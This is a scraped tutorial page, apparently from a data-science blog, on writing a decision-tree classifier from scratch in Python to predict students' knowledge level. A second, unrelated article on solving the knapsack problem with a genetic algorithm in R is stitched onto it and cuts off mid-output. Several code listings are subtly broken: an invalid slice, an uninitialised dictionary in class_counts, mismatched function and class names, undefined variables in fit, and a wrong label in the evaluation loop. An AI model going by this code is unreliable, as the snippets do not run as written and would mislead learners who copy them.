build_tree(false_rows) return Decision_Node(question, true_branch, false_branch) Our fit function basically builds a tree for us. It starts with the root node and finding the best question to ask for that node by using our find_best_split function. It iterates over each value then splits the data and information gain is calculated. Along the way, it keeps track of the question which produces the most gain. After that, if there is still a useful question to ask, the gain will be grater then 0 so rows are sub-grouped into branches and it recursively builds the true branch first until there are no further questions to ask and gain is 0. That node then becomes a Leaf node. code for our Leaf class looks like this: class Leaf: def __init__(self, rows): self.predictions = class_counts(rows) It holds a dictionary of class(“High”, “Low”) and a number of times it appears in the rows from the data that reached the current leaf. for the false branch also the same process is applied. After that, it becomes a Decision_Node. Code for our Decision_Node class looks like this: class Decision_Node: def __init__(self, question,\ true_branch,false_branch): self.question = question self.true_branch = true_branch self.false_branch = false_branch This class just holds the reference of question we’ve asked and two child nodes that result. now we return to the root node and build the false branch. Since there will not be any question to ask so, it becomes the Leaf node and the root node also becomes a Decision_Node. Let's see fit function in action: _tree = fit(train) to print the _tree we have to write a special function. def print_tree(node, spacing=""): # Base case: we've reached a leaf if isinstance(node, Leaf): print (spacing + "Predict", node.predictions) return # Print the question at this node print (spacing + str(node.question)) # Call this function recursively on the true branch print (spacing + '--> True:') print_tree(node.true_branch, spacing + " ") # Call this function recursively on the false branch print (spacing + '--> False:') print_tree(node.false_branch, spacing + " ") this print_tree function helps us to visualize our tree in an awesome way. We have just finished building our Decision Tree Classifier! To understand and see what we’ve built let's write some more helper functions: def classify(row, node): if isinstance(node, Leaf): return node.predictions if node.question.check(row): return classify(row, node.true_branch) else: return classify(row, node.false_branch) classify function helps us to check the confidence by given row and a tree. classify(train[5], _tree) as you can see above, our tree has classified the given value as a Middle with 96 confidence. def print_leaf(counts): total = sum(counts.values()) * 1.0 probs = {} for lbl in counts.keys(): probs[lbl] = str(int(counts[lbl] / total * 100)) + "%" return probs print_leaf function helps us to prettify our prediction. We have successfully built, visualized, and saw our tree in action. Now let's perform a simple model evaluation: for row in testing_data: print ("Actual level: %s. Predicted level: %s" % (df['LABEL'], print_leaf(classify(row, _tree)))) As you can see our tree nicely predicted our test data which was isolated from the train data. Decision Tree Classifier is an awesome algorithm to learn. It is beginner-friendly and is easy to implement as well. We have built a very simple Decision Tree Classifier from scratch without using any abstract libraries to predict the student's knowledge level. By just swapping the dataset and tweaking few functions, you can use this algorithm for another classification purpose as well. [1] H. T. Kahraman, Sagiroglu, S., Colak, I., Developing intuitive knowledge classifier and modeling of users’ domain-dependent data in web, Knowledge-Based Systems, vol. 37, pp. 283–295, 2013 [2] Aurelien Geron, Hands-on Machine Learning with Scikit-Learn, Keras & TensorFlow, O’REILLY, 2nd Edition, 2019
[ { "code": null, "e": 209, "s": 172, "text": "You need to have basic knowledge in:" }, { "code": null, "e": 283, "s": 209, "text": "Python programming languageNumpy (Library for scientific computing)Pandas" }, { "code": null, "e": 311, "s": 283, "text": "Python programming language" }, { "code": null, "e": 352, "s": 311, "text": "Numpy (Library for scientific computing)" }, { "code": null, "e": 359, "s": 352, "text": "Pandas" }, { "code": null, "e": 634, "s": 359, "text": "The data set I am going to use in this project has been sourced from the Machine Learning Repository of the University of California, Irvine User Knowledge Modeling Data Set (UC Irvine). The UCI page mentions the following publication as the original source of the data set:" }, { "code": null, "e": 823, "s": 634, "text": "H. T. Kahraman, Sagiroglu, S., Colak, I., Developing intuitive knowledge classifier and modeling of users’ domain dependent data in web, Knowledge Based Systems, vol. 37, pp. 283–295, 2013" }, { "code": null, "e": 1122, "s": 823, "text": "In simple words, a Decision Tree Classifier is a Supervised Machine learning algorithm that is used for supervised + classification problems. Under the hood in the decision tree, each node asks a True or False question about one of the features and moves left or right with respect to the decision." }, { "code": null, "e": 1172, "s": 1122, "text": "You can learn more about Decision Tree from here." }, { "code": null, "e": 1443, "s": 1172, "text": "We are going to use Machine Learning algorithms to find the patterns on the historical data of the students and classify their knowledge level, and for that, we are going to write our own simple Decision Tree Classifier from scratch by using Python Programming Language." }, { "code": null, "e": 1648, "s": 1443, "text": "Though i am going to explain everything along the way, it will not be a basic level explanation. I will highlight the important concepts with further links so that everyone can explore more on that topic." }, { "code": null, "e": 1714, "s": 1648, "text": "We are going to use pandas for data processing and data cleaning." }, { "code": null, "e": 1771, "s": 1714, "text": "import pandas as pddf = pd.read_csv('data.csv')df.head()" }, { "code": null, "e": 1891, "s": 1771, "text": "First off, we are importing the data.csv file then processing it as a panda’s data frame and taking a peek at the data." }, { "code": null, "e": 2211, "s": 1891, "text": "As we can see our data has 6 columns. It contains 5 features and 1 label. Since this data is already cleaned, there is no need for data cleaning and wrangling. But while working with other real-world datasets it is important to check for null values and outliers in the dataset and engineer the best features out of it." }, { "code": null, "e": 2257, "s": 2211, "text": "train = df.values[-:20]test = df.values[-20:]" }, { "code": null, "e": 2381, "s": 2257, "text": "here we split our data into train and test where the last 20 data of our dataset are test data and the rest are train data." }, { "code": null, "e": 2434, "s": 2381, "text": "Now it’s time to write our Decision Tree Classifier." }, { "code": null, "e": 2493, "s": 2434, "text": "But before diving into code there are few things to learn:" }, { "code": null, "e": 3359, "s": 2493, "text": "To build the tree we are using a Decision Tree learning algorithm called CART. There are other learning algorithms like ID3, C4.5, C5.0, etc. You can learn more about them from here.CART stands for Classification and Regression Trees. CART uses Gini impurity as its metric to quantify how much a question helps to unmix the data or in simple words CARD uses Gini as its cost function to evaluate the error.Under the hood, all the learning algorithms give us a procedure to decide which question to ask and when.To check how correctly the question helped us to unmix the data we use Information Gain. It helps us to reduce the uncertainty and we use this to select the best question to ask and given that question, we recursively build tree nodes. We then further continue dividing the node until there are no questions to ask and we denote that last node as a leaf." }, { "code": null, "e": 3542, "s": 3359, "text": "To build the tree we are using a Decision Tree learning algorithm called CART. There are other learning algorithms like ID3, C4.5, C5.0, etc. You can learn more about them from here." }, { "code": null, "e": 3767, "s": 3542, "text": "CART stands for Classification and Regression Trees. CART uses Gini impurity as its metric to quantify how much a question helps to unmix the data or in simple words CARD uses Gini as its cost function to evaluate the error." }, { "code": null, "e": 3873, "s": 3767, "text": "Under the hood, all the learning algorithms give us a procedure to decide which question to ask and when." }, { "code": null, "e": 4228, "s": 3873, "text": "To check how correctly the question helped us to unmix the data we use Information Gain. It helps us to reduce the uncertainty and we use this to select the best question to ask and given that question, we recursively build tree nodes. We then further continue dividing the node until there are no questions to ask and we denote that last node as a leaf." }, { "code": null, "e": 4361, "s": 4228, "text": "To implement the Decision Tree Classifier we need to know what question to ask about the data and when. Let's write a code for that:" }, { "code": null, "e": 4677, "s": 4361, "text": "class CreateQuestion: def __init__(self, column, value): self.column = column self.value = value def check(self, data): val = data[self.column] return val >= self.value def __repr__(self): return \"Is %s %s %s?\" % ( self.column[-1], \">=\", str(self.value))" }, { "code": null, "e": 4856, "s": 4677, "text": "Above we’ve written a CreateQuestion class that takes 2 inputs: column number and value as an instance variable. It has a check method which is used to compare the feature value." }, { "code": null, "e": 4929, "s": 4856, "text": "__repr__ is just a python’s magic function to help display the question." }, { "code": null, "e": 4953, "s": 4929, "text": "Let's see it in action:" }, { "code": null, "e": 4981, "s": 4953, "text": "q = CreateQuestion(0, 0.08)" }, { "code": null, "e": 5041, "s": 4981, "text": "now let's check if our check method is working fine or not:" }, { "code": null, "e": 5070, "s": 5041, "text": "data = train[0]q.check(data)" }, { "code": null, "e": 5226, "s": 5070, "text": "as we can see we’ve got a False value. Since our 0th value in the train set is 0.0 which is not greater than or equals to 0.08, our method is working fine." }, { "code": null, "e": 5406, "s": 5226, "text": "Now it’s time to create a partition function that helps us to partition our data into two subsets: The first set contains all the data which is True and the second contains False." }, { "code": null, "e": 5435, "s": 5406, "text": "Let's write a code for this:" }, { "code": null, "e": 5655, "s": 5435, "text": "def partition(rows, qsn): true_rows, false_rows = [], [] for row in rows: if qsn.check(row): true_rows.append(row) else: false_rows.append(row) return true_rows, false_rows" }, { "code": null, "e": 5765, "s": 5655, "text": "our partition function takes two inputs: rows and a question then returns a list of true rows and false rows." }, { "code": null, "e": 5799, "s": 5765, "text": "Let's see this in action as well:" }, { "code": null, "e": 5865, "s": 5799, "text": "true_rows, false_rows = partition(train, CreateQuestion(0, 0.08))" }, { "code": null, "e": 5971, "s": 5865, "text": "here true_rows contains all the data grater or equal to 0.08 and false_rows contains data less than 0.08." }, { "code": null, "e": 6202, "s": 5971, "text": "Now it’s time to write our Gini Impurity algorithm. As we’ve discussed earlier, it helps us to quantify how much uncertainty there is in the node, and Information Gain lets us quantify how much a question reduces that uncertainty." }, { "code": null, "e": 6289, "s": 6202, "text": "Impurity metrics range between 0 and 1 where a lower value indicates less uncertainty." }, { "code": null, "e": 6490, "s": 6289, "text": "def gini(rows): counts = class_count(rows) impurity = 1 for label in counts: probab_of_label = counts[label] / float(len(rows)) impurity -= probab_of_label**2 return impurity" }, { "code": null, "e": 6604, "s": 6490, "text": "In our gini function, we have just implemented the formula for Gini. It returns the impurity value of given rows." }, { "code": null, "e": 6801, "s": 6604, "text": "counts variable holds the dictionary with total counts of the given value in the dataset. class_counts is a helper function to count a total number of data present in a dataset of a certain class." }, { "code": null, "e": 6982, "s": 6801, "text": "def class_counts(rows): for row in rows: label = row[-1] if label not in counts: counts[label] = 0 counts[label] += 1 return counts" }, { "code": null, "e": 7008, "s": 6982, "text": "Let's see gini in action:" }, { "code": null, "e": 7131, "s": 7008, "text": "As you can see in image 1 there is some impurity so it returns 0.5 and in image 2 there are no impurities so it returns 0." }, { "code": null, "e": 7196, "s": 7131, "text": "Now we are going to write code for calculating information gain:" }, { "code": null, "e": 7384, "s": 7196, "text": "def info_gain(left, right, current_uncertainty): p = float(len(left)) / (len(left) + len(right)) return current_uncertainty - p * gini(left) \\ - (1 - p) * gini(right)" }, { "code": null, "e": 7505, "s": 7384, "text": "Information gain is calculated by subtracting the uncertainty starting node with a weighted impurity of two child nodes." }, { "code": null, "e": 7547, "s": 7505, "text": "Now it's time to put everything together." }, { "code": null, "e": 8208, "s": 7547, "text": "def find_best_split(rows): best_gain = 0 best_question = None current_uncertainty = gini(rows) n_features = len(rows[0]) - 1 for col in range(n_features): values = set([row[col] for row in rows]) for val in values: question = Question(col, val) true_rows, false_rows = partition(rows, question) if len(true_rows) == 0 or len(false_rows) == 0: continue gain = info_gain(true_rows, false_rows,\\ current_uncertainty) if gain > best_gain: best_gain, best_question = gain, question return best_gain, best_question" }, { "code": null, "e": 8362, "s": 8208, "text": "We have written a find_best_split function which finds the best question by iterating over every feature and labels then calculates the information gain." }, { "code": null, "e": 8397, "s": 8362, "text": "Let's see this function in action:" }, { "code": null, "e": 8447, "s": 8397, "text": "best_gain, best_question = find_best_split(train)" }, { "code": null, "e": 8491, "s": 8447, "text": "We are now going to write our fit function." }, { "code": null, "e": 8905, "s": 8491, "text": "def fit(features, labels): data = features + labels gain, question = find_best_split(data) if gain == 0: return Leaf(rows) true_rows, false_rows = partition(rows, question) # Recursively build the true branch. true_branch = build_tree(true_rows) # Recursively build the false branch. false_branch = build_tree(false_rows) return Decision_Node(question, true_branch, false_branch)" }, { "code": null, "e": 9234, "s": 8905, "text": "Our fit function basically builds a tree for us. It starts with the root node and finding the best question to ask for that node by using our find_best_split function. It iterates over each value then splits the data and information gain is calculated. Along the way, it keeps track of the question which produces the most gain." }, { "code": null, "e": 9466, "s": 9234, "text": "After that, if there is still a useful question to ask, the gain will be grater then 0 so rows are sub-grouped into branches and it recursively builds the true branch first until there are no further questions to ask and gain is 0." }, { "code": null, "e": 9502, "s": 9466, "text": "That node then becomes a Leaf node." }, { "code": null, "e": 9543, "s": 9502, "text": "code for our Leaf class looks like this:" }, { "code": null, "e": 9629, "s": 9543, "text": "class Leaf: def __init__(self, rows): self.predictions = class_counts(rows)" }, { "code": null, "e": 9765, "s": 9629, "text": "It holds a dictionary of class(“High”, “Low”) and a number of times it appears in the rows from the data that reached the current leaf." }, { "code": null, "e": 9860, "s": 9765, "text": "for the false branch also the same process is applied. After that, it becomes a Decision_Node." }, { "code": null, "e": 9910, "s": 9860, "text": "Code for our Decision_Node class looks like this:" }, { "code": null, "e": 10117, "s": 9910, "text": "class Decision_Node: def __init__(self, question,\\ true_branch,false_branch): self.question = question self.true_branch = true_branch self.false_branch = false_branch" }, { "code": null, "e": 10210, "s": 10117, "text": "This class just holds the reference of question we’ve asked and two child nodes that result." }, { "code": null, "e": 10390, "s": 10210, "text": "now we return to the root node and build the false branch. Since there will not be any question to ask so, it becomes the Leaf node and the root node also becomes a Decision_Node." }, { "code": null, "e": 10424, "s": 10390, "text": "Let's see fit function in action:" }, { "code": null, "e": 10443, "s": 10424, "text": "_tree = fit(train)" }, { "code": null, "e": 10499, "s": 10443, "text": "to print the _tree we have to write a special function." }, { "code": null, "e": 11020, "s": 10499, "text": "def print_tree(node, spacing=\"\"): # Base case: we've reached a leaf if isinstance(node, Leaf): print (spacing + \"Predict\", node.predictions) return # Print the question at this node print (spacing + str(node.question)) # Call this function recursively on the true branch print (spacing + '--> True:') print_tree(node.true_branch, spacing + \" \") # Call this function recursively on the false branch print (spacing + '--> False:') print_tree(node.false_branch, spacing + \" \")" }, { "code": null, "e": 11095, "s": 11020, "text": "this print_tree function helps us to visualize our tree in an awesome way." }, { "code": null, "e": 11156, "s": 11095, "text": "We have just finished building our Decision Tree Classifier!" }, { "code": null, "e": 11235, "s": 11156, "text": "To understand and see what we’ve built let's write some more helper functions:" }, { "code": null, "e": 11458, "s": 11235, "text": "def classify(row, node): if isinstance(node, Leaf): return node.predictions if node.question.check(row): return classify(row, node.true_branch) else: return classify(row, node.false_branch)" }, { "code": null, "e": 11534, "s": 11458, "text": "classify function helps us to check the confidence by given row and a tree." }, { "code": null, "e": 11560, "s": 11534, "text": "classify(train[5], _tree)" }, { "code": null, "e": 11654, "s": 11560, "text": "as you can see above, our tree has classified the given value as a Middle with 96 confidence." }, { "code": null, "e": 11840, "s": 11654, "text": "def print_leaf(counts): total = sum(counts.values()) * 1.0 probs = {} for lbl in counts.keys(): probs[lbl] = str(int(counts[lbl] / total * 100)) + \"%\" return probs" }, { "code": null, "e": 11897, "s": 11840, "text": "print_leaf function helps us to prettify our prediction." }, { "code": null, "e": 11965, "s": 11897, "text": "We have successfully built, visualized, and saw our tree in action." }, { "code": null, "e": 12010, "s": 11965, "text": "Now let's perform a simple model evaluation:" }, { "code": null, "e": 12146, "s": 12010, "text": "for row in testing_data: print (\"Actual level: %s. Predicted level: %s\" % (df['LABEL'], print_leaf(classify(row, _tree))))" }, { "code": null, "e": 12241, "s": 12146, "text": "As you can see our tree nicely predicted our test data which was isolated from the train data." }, { "code": null, "e": 12631, "s": 12241, "text": "Decision Tree Classifier is an awesome algorithm to learn. It is beginner-friendly and is easy to implement as well. We have built a very simple Decision Tree Classifier from scratch without using any abstract libraries to predict the student's knowledge level. By just swapping the dataset and tweaking few functions, you can use this algorithm for another classification purpose as well." }, { "code": null, "e": 12824, "s": 12631, "text": "[1] H. T. Kahraman, Sagiroglu, S., Colak, I., Developing intuitive knowledge classifier and modeling of users’ domain-dependent data in web, Knowledge-Based Systems, vol. 37, pp. 283–295, 2013" } ]
Genetic Algorithm in R: The Knapsack Problem | by Raden Aurelius Andhika Viadinugroho | Towards Data Science
Motivation The Knapsack Problem is one of the famous problems in optimization, specifically in combinatoric optimization. The motivation of this problem comes where someone needs to maximize his knapsack capacity — hence the name — with the most valuable items possible. There are many approaches to solve this problem, but in this article, I will give you an example to solve this problem using the Genetic Algorithm approach in R. The Knapsack Problem In this article, the knapsack problem that we will try to solve is the 0–1 knapsack problem. Given a set of n items numbered from 1 to n, each with weight w_i and a value v_i. Suppose that each item copies are restricted to 1, i.e. the item is either included in the knapsack or not. Here we want to maximize the objective function (i.e. the values of items in the knapsack) where the objective function is subject to the constraint function Genetic Algorithm Concepts Genetic Algorithm is one of the optimization algorithms based on the evolution concept by natural selection. As proposed by Charles Darwin, evolution by natural selection is the mechanism on how many varieties of living things will adapt to the environment to survive through two principles: natural selection and mutation. Based on that concept, the Genetic Algorithm's goal is to gain the optimal solutions of the objective function by selecting the best or fittest solution alongside the rare and random mutation occurrence. The algorithm itself can be explained as follows. Initialize the data and/or the function that we will optimize.Initialize the population size, maximum iteration number (the number of generations), crossover probability, mutation probability, and the number of elitism (the best or fittest individual that won’t undergo mutation).From the population, select two individuals, then perform crossover between two individuals with probability p.Then, perform mutation between two individuals with probability p (usually the probability of mutation are really low).Repeat steps 3 and 4 until all individuals in one generation are trained. These all individuals will be used for training the next generation until the number of generations is reaching the limit. Initialize the data and/or the function that we will optimize. Initialize the population size, maximum iteration number (the number of generations), crossover probability, mutation probability, and the number of elitism (the best or fittest individual that won’t undergo mutation). From the population, select two individuals, then perform crossover between two individuals with probability p. Then, perform mutation between two individuals with probability p (usually the probability of mutation are really low). Repeat steps 3 and 4 until all individuals in one generation are trained. These all individuals will be used for training the next generation until the number of generations is reaching the limit. To give you a better understanding of the genetic algorithm, let’s jump to the case study where we will use the genetic algorithm to solve the knapsack problem in R. Case Study: Solving Knapsack Problem using Genetic Algorithm Suppose that you want to go hiking with your friends, and you have the items that you can use for hiking, with the weight (in kilograms) and survival point of each item, respectively, as follows. Suppose too that you have a knapsack that can contain items with a maximum capacity of 25 kilograms, where you can only bring one copy for each item. The goal is: you want to maximize your knapsack capacity while maximizing your survival points as well. From the problem statement, we can define the weight of the items as the constraint function, while the survival points cumulated from the items in the knapsack as the objective function. For the implementation in this article, here we using the GA library in R created by Luca Scrucca [2]. First, we need to input the data and the parameters that we used by writing these lines of code. #0-1 Knapsack's Problemlibrary(GA)item=c('raincoat','pocket knife','mineral water','gloves','sleeping bag','tent','portable stove','canned food','snacks')weight=c(2,1,6,1,4,9,5,8,3)survival=c(5,3,15,5,6,18,8,20,8)data=data.frame(item,weight,survival)max_weight=25 To give you a better understanding of the genetic algorithm in this problem, suppose that we only bring a pocket knife, mineral water, and snacks in your knapsack, initially. We can write it as the “chromosome”, and since the problem that we want to solve is a 0–1 knapsack problem, then from these lines of codes below, 1 means that we bring the item, while 0 means that we left the item. #1 means that we bring the item, while 0 means that we left the itemchromosomes=c(0,1,1,0,0,0,0,0,1)data[chromosomes==1,] We can see the result as follows. > data[chromosomes==1,] item weight survival2 pocket knife 1 33 mineral water 6 159 snacks 3 8 Then, we create the objective function that we want to optimize with the constraint function by writing these lines of code below. The fitness the function will we use in the ga function from the GA library. #create the function that we want to optimizefitness=function(x){ current_survpoint=x%*%data$survival current_weight=x%*%data$weight if(current_weight>max_weight) { return(0) } else { return(current_survpoint) }} Now here’s the interesting part: the optimization process using the genetic algorithm. Suppose that we want to create a maximum of 30 generations and 50 individuals for the optimization process. For reproducibility, we write the seed argument and keep the best solution. GA=ga(type='binary',fitness=fitness,nBits=nrow(data),maxiter=30,popSize=50,seed=1234,keepBest=TRUE)summary(GA)plot(GA) By running the line of code above, we can achieve the result as follows. > GA=ga(type='binary',fitness=fitness,nBits=nrow(data),maxiter=30,popSize=50,seed=1234,keepBest=TRUE)GA | iter = 1 | Mean = 31.92 | Best = 61.00GA | iter = 2 | Mean = 31.32 | Best = 61.00GA | iter = 3 | Mean = 33.08 | Best = 61.00GA | iter = 4 | Mean = 36.14 | Best = 61.00GA | iter = 5 | Mean = 42.42 | Best = 61.00GA | iter = 6 | Mean = 36.56 | Best = 61.00GA | iter = 7 | Mean = 37.32 | Best = 61.00GA | iter = 8 | Mean = 38.18 | Best = 61.00GA | iter = 9 | Mean = 39.02 | Best = 61.00GA | iter = 10 | Mean = 38.92 | Best = 61.00GA | iter = 11 | Mean = 37.54 | Best = 61.00GA | iter = 12 | Mean = 35.14 | Best = 61.00GA | iter = 13 | Mean = 36.28 | Best = 61.00GA | iter = 14 | Mean = 40.82 | Best = 61.00GA | iter = 15 | Mean = 44.26 | Best = 61.00GA | iter = 16 | Mean = 41.62 | Best = 61.00GA | iter = 17 | Mean = 38.66 | Best = 61.00GA | iter = 18 | Mean = 36.24 | Best = 61.00GA | iter = 19 | Mean = 43 | Best = 61GA | iter = 20 | Mean = 43.48 | Best = 61.00GA | iter = 21 | Mean = 43.08 | Best = 61.00GA | iter = 22 | Mean = 44.88 | Best = 61.00GA | iter = 23 | Mean = 46.84 | Best = 61.00GA | iter = 24 | Mean = 46.8 | Best = 61.0GA | iter = 25 | Mean = 42.62 | Best = 61.00GA | iter = 26 | Mean = 46.52 | Best = 61.00GA | iter = 27 | Mean = 46.14 | Best = 61.00GA | iter = 28 | Mean = 43.8 | Best = 61.0GA | iter = 29 | Mean = 46.16 | Best = 61.00GA | iter = 30 | Mean = 42.6 | Best = 61.0> summary(GA)-- Genetic Algorithm ------------------- GA settings: Type = binary Population size = 50 Number of generations = 30 Elitism = 2 Crossover probability = 0.8 Mutation probability = 0.1GA results: Iterations = 30 Fitness function value = 61 Solution = x1 x2 x3 x4 x5 x6 x7 x8 x9[1,] 1 0 1 1 0 0 1 1 1> GA@summary max mean q3 median q1 min[1,] 61 31.92 48 36.0 16 0[2,] 61 31.32 47 31.0 24 0[3,] 61 33.08 51 36.5 13 0[4,] 61 36.14 52 39.0 31 0[5,] 61 42.42 56 47.5 38 0[6,] 61 36.56 52 41.5 26 0[7,] 61 37.32 54 43.0 29 0[8,] 61 38.18 54 43.0 29 0[9,] 61 39.02 55 47.0 33 0[10,] 61 38.92 52 43.5 33 0[11,] 61 37.54 48 39.0 33 0[12,] 61 35.14 47 39.0 29 0[13,] 61 36.28 47 41.0 23 0[14,] 61 40.82 51 43.0 34 0[15,] 61 44.26 51 48.0 38 20[16,] 61 41.62 52 45.0 34 0[17,] 61 38.66 53 41.5 28 0[18,] 61 36.24 51 39.5 28 0[19,] 61 43.00 56 48.0 37 0[20,] 61 43.48 56 48.0 39 0[21,] 61 43.08 56 48.0 40 0[22,] 61 44.88 56 51.0 41 0[23,] 61 46.84 56 52.0 41 0[24,] 61 46.80 56 48.0 41 0[25,] 61 42.62 56 48.0 33 0[26,] 61 46.52 56 48.0 42 0[27,] 61 46.14 54 47.0 43 0[28,] 61 43.80 56 49.5 40 0[29,] 61 46.16 54 50.0 43 0[30,] 61 42.60 56 48.0 36 0 From the result above, we can see that the performance for every individual is increasing in each generation. We can see it from the fitness value (i.e. the survival points in this case) mean and median that tends to increases in each generation. Let’s try to train it again, but with more generations. GA2=ga(type='binary',fitness=fitness,nBits=nrow(data),maxiter=50,popSize=50,seed=1234,keepBest=TRUE)GA3=ga(type='binary',fitness=fitness,nBits=nrow(data),maxiter=100,popSize=50,seed=1234,keepBest=TRUE)plot(GA2)plot(GA3) From GA2 and GA3 , we can see that the optimization result for each individual is at their best on generation 40-ish and 60-ish, according to the mean and median of fitness value on that generation. We can also see that the best fitness value is increasing to 62 from 72nd generation onwards. Since we keep the best result on every optimization process, we want to find out the items that we can bring for hiking based on the best result from the genetic algorithm optimization. We can see the summary from GA3 as follows. > summary(GA3)-- Genetic Algorithm ------------------- GA settings: Type = binary Population size = 50 Number of generations = 100 Elitism = 2 Crossover probability = 0.8 Mutation probability = 0.1GA results: Iterations = 100 Fitness function value = 62 Solution = x1 x2 x3 x4 x5 x6 x7 x8 x9[1,] 1 1 1 1 1 0 0 1 1 From the result above, we can conclude that the items that we can include in the knapsack are a raincoat, pocket knife, mineral water, gloves, sleeping bag, canned food, and snacks. We can calculate the weight of the knapsack, to make sure that the knapsack is not over capacitated. > chromosomes_final=c(1,1,1,1,1,0,0,1,1)> cat(chromosomes_final%*%data$weight)25 Great! We can see that the weight of the items is the same as the knapsack capacity! Conclusion And there you go! You can go hiking with your friends (best to do after the pandemic is over, of course) with maximum survival points and capacity by implementing the genetic algorithm in R. In fact, you can solve the knapsack problem by using genetic algorithm in many real-world applications, such as choosing the best-performing portfolio, production scheduling, and many more. As usual, feel free to contact me via my LinkedIn if you have any questions or discussions. Stay safe and stay healthy! References [1] G. B. Matthews, On the Partition of Numbers (1897), Proceedings of the London Mathematical Society. [2] Luca Scrucca, GA: A Package for Genetic Algorithms in R (2013), Journal of Statistical Software. [3] https://www.rdocumentation.org/packages/GA/versions/3.2/topics/ga [4] Harvey M. Salkin and Cornelis A. De Kluyver, The knapsack problem: A survey (1975), Naval Research Logistics Quarterly. [5] Krzysztof Dudziński and Stanisław Walukiewicz, Exact methods for the knapsack problem and its generalizations (1987), European Journal of Operational Research. [6] Sami Khuri, Thomas Bäck, and Jörg Heitkötter, The zero/one multiple knapsack problem and genetic algorithms (1994), SAC ’94: Proceedings of the 1994 ACM symposium on Applied computing.
[ { "code": null, "e": 57, "s": 46, "text": "Motivation" }, { "code": null, "e": 479, "s": 57, "text": "The Knapsack Problem is one of the famous problems in optimization, specifically in combinatoric optimization. The motivation of this problem comes where someone needs to maximize his knapsack capacity — hence the name — with the most valuable items possible. There are many approaches to solve this problem, but in this article, I will give you an example to solve this problem using the Genetic Algorithm approach in R." }, { "code": null, "e": 500, "s": 479, "text": "The Knapsack Problem" }, { "code": null, "e": 875, "s": 500, "text": "In this article, the knapsack problem that we will try to solve is the 0–1 knapsack problem. Given a set of n items numbered from 1 to n, each with weight w_i and a value v_i. Suppose that each item copies are restricted to 1, i.e. the item is either included in the knapsack or not. Here we want to maximize the objective function (i.e. the values of items in the knapsack)" }, { "code": null, "e": 942, "s": 875, "text": "where the objective function is subject to the constraint function" }, { "code": null, "e": 969, "s": 942, "text": "Genetic Algorithm Concepts" }, { "code": null, "e": 1547, "s": 969, "text": "Genetic Algorithm is one of the optimization algorithms based on the evolution concept by natural selection. As proposed by Charles Darwin, evolution by natural selection is the mechanism on how many varieties of living things will adapt to the environment to survive through two principles: natural selection and mutation. Based on that concept, the Genetic Algorithm's goal is to gain the optimal solutions of the objective function by selecting the best or fittest solution alongside the rare and random mutation occurrence. The algorithm itself can be explained as follows." }, { "code": null, "e": 2254, "s": 1547, "text": "Initialize the data and/or the function that we will optimize.Initialize the population size, maximum iteration number (the number of generations), crossover probability, mutation probability, and the number of elitism (the best or fittest individual that won’t undergo mutation).From the population, select two individuals, then perform crossover between two individuals with probability p.Then, perform mutation between two individuals with probability p (usually the probability of mutation are really low).Repeat steps 3 and 4 until all individuals in one generation are trained. These all individuals will be used for training the next generation until the number of generations is reaching the limit." }, { "code": null, "e": 2317, "s": 2254, "text": "Initialize the data and/or the function that we will optimize." }, { "code": null, "e": 2536, "s": 2317, "text": "Initialize the population size, maximum iteration number (the number of generations), crossover probability, mutation probability, and the number of elitism (the best or fittest individual that won’t undergo mutation)." }, { "code": null, "e": 2648, "s": 2536, "text": "From the population, select two individuals, then perform crossover between two individuals with probability p." }, { "code": null, "e": 2768, "s": 2648, "text": "Then, perform mutation between two individuals with probability p (usually the probability of mutation are really low)." }, { "code": null, "e": 2965, "s": 2768, "text": "Repeat steps 3 and 4 until all individuals in one generation are trained. These all individuals will be used for training the next generation until the number of generations is reaching the limit." }, { "code": null, "e": 3131, "s": 2965, "text": "To give you a better understanding of the genetic algorithm, let’s jump to the case study where we will use the genetic algorithm to solve the knapsack problem in R." }, { "code": null, "e": 3192, "s": 3131, "text": "Case Study: Solving Knapsack Problem using Genetic Algorithm" }, { "code": null, "e": 3388, "s": 3192, "text": "Suppose that you want to go hiking with your friends, and you have the items that you can use for hiking, with the weight (in kilograms) and survival point of each item, respectively, as follows." }, { "code": null, "e": 3830, "s": 3388, "text": "Suppose too that you have a knapsack that can contain items with a maximum capacity of 25 kilograms, where you can only bring one copy for each item. The goal is: you want to maximize your knapsack capacity while maximizing your survival points as well. From the problem statement, we can define the weight of the items as the constraint function, while the survival points cumulated from the items in the knapsack as the objective function." }, { "code": null, "e": 4030, "s": 3830, "text": "For the implementation in this article, here we using the GA library in R created by Luca Scrucca [2]. First, we need to input the data and the parameters that we used by writing these lines of code." }, { "code": null, "e": 4294, "s": 4030, "text": "#0-1 Knapsack's Problemlibrary(GA)item=c('raincoat','pocket knife','mineral water','gloves','sleeping bag','tent','portable stove','canned food','snacks')weight=c(2,1,6,1,4,9,5,8,3)survival=c(5,3,15,5,6,18,8,20,8)data=data.frame(item,weight,survival)max_weight=25" }, { "code": null, "e": 4684, "s": 4294, "text": "To give you a better understanding of the genetic algorithm in this problem, suppose that we only bring a pocket knife, mineral water, and snacks in your knapsack, initially. We can write it as the “chromosome”, and since the problem that we want to solve is a 0–1 knapsack problem, then from these lines of codes below, 1 means that we bring the item, while 0 means that we left the item." }, { "code": null, "e": 4806, "s": 4684, "text": "#1 means that we bring the item, while 0 means that we left the itemchromosomes=c(0,1,1,0,0,0,0,0,1)data[chromosomes==1,]" }, { "code": null, "e": 4840, "s": 4806, "text": "We can see the result as follows." }, { "code": null, "e": 4988, "s": 4840, "text": "> data[chromosomes==1,] item weight survival2 pocket knife 1 33 mineral water 6 159 snacks 3 8" }, { "code": null, "e": 5196, "s": 4988, "text": "Then, we create the objective function that we want to optimize with the constraint function by writing these lines of code below. The fitness the function will we use in the ga function from the GA library." }, { "code": null, "e": 5423, "s": 5196, "text": "#create the function that we want to optimizefitness=function(x){ current_survpoint=x%*%data$survival current_weight=x%*%data$weight if(current_weight>max_weight) { return(0) } else { return(current_survpoint) }}" }, { "code": null, "e": 5694, "s": 5423, "text": "Now here’s the interesting part: the optimization process using the genetic algorithm. Suppose that we want to create a maximum of 30 generations and 50 individuals for the optimization process. For reproducibility, we write the seed argument and keep the best solution." }, { "code": null, "e": 5813, "s": 5694, "text": "GA=ga(type='binary',fitness=fitness,nBits=nrow(data),maxiter=30,popSize=50,seed=1234,keepBest=TRUE)summary(GA)plot(GA)" }, { "code": null, "e": 5886, "s": 5813, "text": "By running the line of code above, we can achieve the result as follows." }, { "code": null, "e": 8663, "s": 5886, "text": "> GA=ga(type='binary',fitness=fitness,nBits=nrow(data),maxiter=30,popSize=50,seed=1234,keepBest=TRUE)GA | iter = 1 | Mean = 31.92 | Best = 61.00GA | iter = 2 | Mean = 31.32 | 